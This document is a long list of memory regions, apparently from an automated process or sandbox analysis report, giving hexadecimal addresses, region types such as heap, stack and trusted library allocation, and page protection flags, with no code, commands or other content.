9740000
trusted library allocation
page read and write
4DC0000
heap
page read and write
9800000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
35F6000
heap
page read and write
9800000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9C00000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
5A2E000
trusted library allocation
page read and write
54B0000
direct allocation
page read and write
9A00000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
A65D000
trusted library allocation
page read and write
9B00000
trusted library allocation
page execute and read and write
9840000
trusted library allocation
page read and write
98C0000
unkown
page read and write
55B1000
heap
page read and write
A6E0000
trusted library allocation
page read and write
95D0000
unkown
page read and write
9800000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8858000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
5A64000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9AE0000
trusted library allocation
page read and write
97F0000
unkown
page read and write
9840000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
50FC000
stack
page read and write
8850000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
319C000
stack
page read and write
9A50000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
A6E7000
trusted library allocation
page read and write
4CF0000
heap
page read and write
981A000
trusted library allocation
page read and write
3330000
heap
page read and write
9BF5000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
3598000
heap
page read and write
8890000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
554A000
heap
page read and write
6BF5CFE000
stack
page read and write
A650000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page execute and read and write
55BF000
heap
page read and write
9760000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
9970000
trusted library allocation
page read and write
481E000
stack
page read and write
7BE4000
trusted library allocation
page read and write
5548000
direct allocation
page read and write
5540000
trusted library allocation
page read and write
360B000
heap
page read and write
A6D0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
52F3000
trusted library allocation
page execute and read and write
8860000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
8610000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
33E7000
heap
page read and write
88B0000
unkown
page read and write
8854000
trusted library allocation
page read and write
4F70000
heap
page read and write
9800000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
5542000
direct allocation
page read and write
8850000
trusted library allocation
page read and write
55BF000
heap
page read and write
A6F0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
9605000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
9767000
trusted library allocation
page read and write
97D000
stack
page read and write
533B000
trusted library allocation
page execute and read and write
8880000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
3510000
trusted library section
page read and write
97E0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
5050000
heap
page read and write
8830000
unkown
page read and write
8840000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
515D000
stack
page read and write
5C15000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
5870000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
8860000
unkown
page read and write
95C0000
trusted library allocation
page read and write
85D0000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
A6A9000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
76A0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
4E9F000
stack
page read and write
9B30000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
4ECA000
heap
page read and write
8630000
trusted library allocation
page read and write
4DDE000
stack
page read and write
85C0000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
55C0000
trusted library allocation
page read and write
542F000
stack
page read and write
97D0000
trusted library allocation
page read and write
9D40000
trusted library section
page read and write
97A1000
trusted library allocation
page read and write
43E0000
heap
page read and write
4E66000
direct allocation
page read and write
9890000
unkown
page read and write
85E0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
53A6000
heap
page read and write
538A000
heap
page read and write
97D0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
76A0000
trusted library allocation
page read and write
A6B7000
trusted library allocation
page read and write
952F000
stack
page read and write
A6D0000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
17DC6802000
heap
page read and write
7680000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9AE0000
trusted library allocation
page read and write
771D000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
95E9000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
5A9A000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
5312000
direct allocation
page read and write
8860000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
43D0000
heap
page read and write
9840000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page execute and read and write
9768000
trusted library allocation
page read and write
5D5E000
stack
page read and write
8840000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
5529000
heap
page read and write
86B7000
heap
page read and write
7BDC000
stack
page read and write
95D0000
unkown
page read and write
9755000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
975B000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
5575000
heap
page read and write
55A5000
heap
page read and write
A650000
trusted library allocation
page read and write
A685000
trusted library allocation
page read and write
8761000
heap
page read and write
17DC6650000
heap
page read and write
97E0000
trusted library allocation
page read and write
86F0000
heap
page read and write
9800000
trusted library section
page read and write
A6E0000
trusted library allocation
page read and write
9950000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
4F12000
heap
page read and write
97DF000
unkown
page read and write
5190000
heap
page read and write
A700000
trusted library allocation
page read and write
9AF3000
trusted library allocation
page read and write
54F0000
direct allocation
page read and write
8890000
trusted library allocation
page read and write
8855000
trusted library allocation
page read and write
54BC000
direct allocation
page read and write
9740000
trusted library allocation
page read and write
95D0000
unkown
page read and write
17DC6845000
heap
page read and write
94EE000
stack
page read and write
97D0000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
5581000
heap
page read and write
9B20000
trusted library allocation
page read and write
17DC6800000
heap
page read and write
542D000
stack
page read and write
A700000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
35BB000
heap
page read and write
97D0000
trusted library allocation
page read and write
5C1F000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
97D5000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
5ABA000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
3659000
heap
page read and write
9AF0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9BC5000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
86E9000
heap
page read and write
9A00000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
4EEC000
heap
page read and write
9740000
trusted library allocation
page read and write
A689000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
8856000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
4F38000
heap
page read and write
85F0000
trusted library allocation
page read and write
35B6000
heap
page read and write
5BA4000
heap
page read and write
95E0000
trusted library allocation
page read and write
52A0000
direct allocation
page read and write
8880000
trusted library allocation
page read and write
9805000
unkown
page read and write
9A00000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
53E0000
heap
page read and write
9830000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
3659000
heap
page read and write
A685000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
95C0000
unkown
page read and write
9750000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
8850000
unkown
page read and write
8830000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
5251000
direct allocation
page read and write
95C7000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
4960000
heap
page read and write
9750000
trusted library allocation
page read and write
4BDF000
stack
page read and write
A6D0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
9615000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
35D8000
heap
page read and write
A6E0000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
6BF58FE000
stack
page read and write
A685000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
5553000
heap
page read and write
9A40000
trusted library allocation
page read and write
4F38000
heap
page read and write
344C000
stack
page read and write
8860000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page execute and read and write
A680000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
5242000
direct allocation
page read and write
77A0000
trusted library allocation
page read and write
2EA9000
stack
page read and write
9B30000
trusted library allocation
page read and write
553F000
heap
page read and write
8890000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
52FF000
heap
page read and write
8E70000
heap
page read and write
9750000
trusted library allocation
page read and write
539B000
heap
page read and write
85F0000
trusted library allocation
page read and write
51F0000
heap
page read and write
9980000
unkown
page read and write
9810000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9B17000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
53B2000
heap
page read and write
53E9000
heap
page read and write
9820000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
8600000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
86F0000
heap
page read and write
5BBC000
heap
page read and write
53A0000
heap
page read and write
7900000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
B0FB000
stack
page read and write
9A15000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
4F14000
heap
page read and write
9850000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
52CD000
heap
page read and write
53F7000
heap
page read and write
8701000
heap
page read and write
8860000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
98D0000
unkown
page read and write
95E0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
55BF000
heap
page read and write
8860000
trusted library allocation
page read and write
A687000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
86FF000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
3570000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
55B0000
trusted library allocation
page execute and read and write
8860000
trusted library allocation
page read and write
5BA1000
heap
page read and write
8835000
trusted library allocation
page read and write
4F2F000
heap
page read and write
8850000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9BD0000
unkown
page read and write
9750000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9BA8000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
85E0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
4E80000
direct allocation
page read and write
7FBB0000
trusted library allocation
page execute and read and write
8888000
trusted library allocation
page read and write
50CE000
stack
page read and write
9AE0000
trusted library allocation
page read and write
9C60000
trusted library allocation
page read and write
A686000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
78F0000
trusted library allocation
page read and write
5290000
heap
page read and write
5240000
direct allocation
page read and write
4E71000
direct allocation
page read and write
A650000
trusted library allocation
page read and write
85C0000
trusted library allocation
page read and write
3600000
heap
page read and write
79C0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
875E000
heap
page read and write
9A10000
trusted library allocation
page read and write
9A42000
trusted library allocation
page read and write
539E000
heap
page read and write
9800000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
980000
heap
page read and write
5B5D000
trusted library allocation
page read and write
95C0000
unkown
page read and write
52C4000
heap
page read and write
52B7000
heap
page read and write
A690000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page execute and read and write
53E1000
heap
page read and write
97D0000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
88A5000
trusted library allocation
page read and write
551D000
stack
page read and write
A6C0000
trusted library allocation
page read and write
50DD000
stack
page read and write
3646000
heap
page read and write
86F0000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
9B75000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
5320000
direct allocation
page read and write
3631000
heap
page read and write
9850000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
9C40000
unkown
page read and write
9740000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
9C10000
trusted library allocation
page read and write
A685000
trusted library allocation
page read and write
95C0000
unkown
page read and write
9808000
unkown
page read and write
9600000
trusted library allocation
page read and write
9626000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
52C0000
heap
page read and write
5548000
heap
page read and write
9750000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
8772000
heap
page read and write
97D0000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
99EE000
stack
page read and write
552D000
heap
page read and write
9807000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
4F09000
heap
page read and write
95C0000
trusted library allocation
page read and write
547E000
stack
page read and write
A656000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
8890000
unkown
page read and write
4F0A000
heap
page read and write
566F000
stack
page read and write
392D000
heap
page read and write
A680000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9800000
unkown
page read and write
97A0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
53AD000
heap
page read and write
9700000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9B85000
trusted library allocation
page read and write
5ACE000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
3928000
heap
page read and write
52D1000
heap
page read and write
97C0000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
3529000
heap
page read and write
9730000
trusted library allocation
page read and write
9860000
heap
page read and write
9810000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
554A000
heap
page read and write
5B9F000
stack
page read and write
9760000
trusted library allocation
page read and write
8856000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
A685000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
5321000
direct allocation
page read and write
7690000
trusted library allocation
page read and write
3400000
heap
page read and write
97A0000
trusted library allocation
page read and write
6BF59FE000
stack
page read and write
86FD000
heap
page read and write
8830000
unkown
page read and write
9B50000
trusted library allocation
page read and write
78B6000
trusted library allocation
page read and write
A655000
trusted library allocation
page read and write
362D000
heap
page read and write
8880000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
5C38000
trusted library allocation
page read and write
85F0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
A670000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9615000
trusted library allocation
page read and write
5310000
heap
page read and write
8880000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9938000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
361E000
heap
page read and write
A6E0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
95C9000
unkown
page read and write
97A0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
A6A4000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
4F1F000
stack
page read and write
7BE0000
trusted library allocation
page read and write
95C7000
unkown
page read and write
A680000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
7A20000
heap
page read and write
8830000
trusted library allocation
page read and write
52C0000
heap
page read and write
76AD000
trusted library allocation
page read and write
539A000
heap
page read and write
7BE0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9774000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9980000
trusted library allocation
page read and write
533F000
direct allocation
page read and write
97E0000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
8723000
heap
page read and write
8830000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
9785000
trusted library allocation
page read and write
88B0000
trusted library allocation
page read and write
5874000
trusted library allocation
page read and write
52FD000
trusted library allocation
page execute and read and write
97E0000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
4D60000
heap
page read and write
53F7000
heap
page read and write
97D0000
trusted library allocation
page read and write
8885000
trusted library allocation
page read and write
768C000
trusted library allocation
page read and write
9B25000
trusted library allocation
page read and write
5576000
heap
page read and write
9A59000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
800000
heap
page read and write
A6B0000
trusted library allocation
page read and write
76E5000
trusted library allocation
page read and write
4DFD000
stack
page read and write
2E90000
heap
page read and write
8890000
unkown
page read and write
4EE1000
heap
page read and write
78B0000
trusted library allocation
page read and write
889C000
trusted library allocation
page read and write
58E6000
trusted library allocation
page read and write
53A6000
heap
page read and write
9A40000
trusted library allocation
page read and write
5580000
heap
page read and write
5544000
heap
page read and write
4D9E000
stack
page read and write
17DC67C0000
trusted library allocation
page read and write
5C0B000
heap
page read and write
97F0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
4CFC000
stack
page read and write
9B70000
trusted library allocation
page read and write
8880000
unkown
page read and write
8830000
trusted library allocation
page read and write
509F000
stack
page read and write
A680000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
85F0000
trusted library allocation
page read and write
51F9000
stack
page read and write
8880000
trusted library allocation
page read and write
4EF1000
heap
page read and write
9780000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
51F8000
heap
page read and write
97E0000
trusted library allocation
page read and write
5054000
heap
page read and write
96C0000
trusted library allocation
page read and write
88B5000
unkown
page read and write
7660000
trusted library allocation
page read and write
33F0000
heap
page read and write
9839000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
9A05000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
17DC683D000
heap
page read and write
A6B0000
trusted library allocation
page read and write
9805000
trusted library allocation
page read and write
8761000
heap
page read and write
5350000
heap
page read and write
9850000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
5549000
heap
page read and write
9750000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
9820000
unkown
page read and write
FB1000
stack
page read and write
7B9E000
stack
page read and write
9C40000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
5BE3000
heap
page read and write
8850000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
532E000
stack
page read and write
85A0000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
5378000
heap
page read and write
9720000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
55A0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
99A0000
unkown
page read and write
9A10000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
85F0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9800000
unkown
page read and write
9810000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
5A47000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
52F4000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
52B0000
heap
page read and write
9850000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
5A4F000
trusted library allocation
page read and write
8855000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9950000
trusted library allocation
page read and write
8830000
unkown
page read and write
4EE2000
heap
page read and write
97E0000
trusted library allocation
page read and write
9B25000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
52B5000
heap
page read and write
8880000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
9D0000
heap
page read and write
9C30000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
5470000
direct allocation
page read and write
9AF0000
trusted library allocation
page read and write
9752000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
99D0000
unkown
page read and write
A690000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
A01000
direct allocation
page read and write
A698000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
65ED000
trusted library allocation
page read and write
9BD7000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
9990000
trusted library allocation
page read and write
95C0000
unkown
page read and write
76A0000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
98A6000
trusted library allocation
page read and write
5117000
heap
page read and write
9740000
trusted library allocation
page read and write
5C34000
trusted library allocation
page read and write
A685000
trusted library allocation
page read and write
4E5F000
stack
page read and write
97D0000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
5A8E000
trusted library allocation
page read and write
556F000
stack
page read and write
A680000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
9793000
trusted library allocation
page read and write
7693000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
97E5000
trusted library allocation
page read and write
8886000
trusted library allocation
page read and write
A681000
trusted library allocation
page read and write
8600000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
368E000
heap
page read and write
9B70000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
9B80000
unkown
page read and write
9900000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
4F22000
heap
page read and write
97D0000
trusted library allocation
page read and write
5510000
heap
page read and write
4ED9000
heap
page read and write
97D0000
trusted library allocation
page read and write
76A0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
5A86000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
539C000
heap
page read and write
A685000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
4F11000
heap
page read and write
586E000
stack
page read and write
6612000
trusted library allocation
page read and write
5C63000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
86D8000
heap
page read and write
9780000
trusted library allocation
page read and write
9BF0000
trusted library allocation
page read and write
4EA0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9A5C000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9810000
unkown
page read and write
5440000
trusted library allocation
page read and write
95C0000
unkown
page read and write
95E0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
98E4000
unkown
page read and write
99B0000
trusted library allocation
page read and write
8836000
trusted library allocation
page read and write
4E59000
stack
page read and write
9830000
trusted library allocation
page read and write
54AC000
direct allocation
page read and write
9670000
unkown
page read and write
9AE0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page execute and read and write
7710000
trusted library allocation
page read and write
4EE0000
heap
page read and write
95C0000
unkown
page read and write
A680000
trusted library allocation
page read and write
554A000
heap
page read and write
8830000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
5BD2000
trusted library allocation
page read and write
5410000
direct allocation
page read and write
9830000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
A6A0000
trusted library section
page read and write
5540000
heap
page read and write
9B20000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
95D5000
unkown
page read and write
8830000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9C0000
heap
page read and write
9740000
trusted library allocation
page read and write
95C0000
unkown
page read and write
9800000
trusted library allocation
page read and write
9750000
trusted library allocation
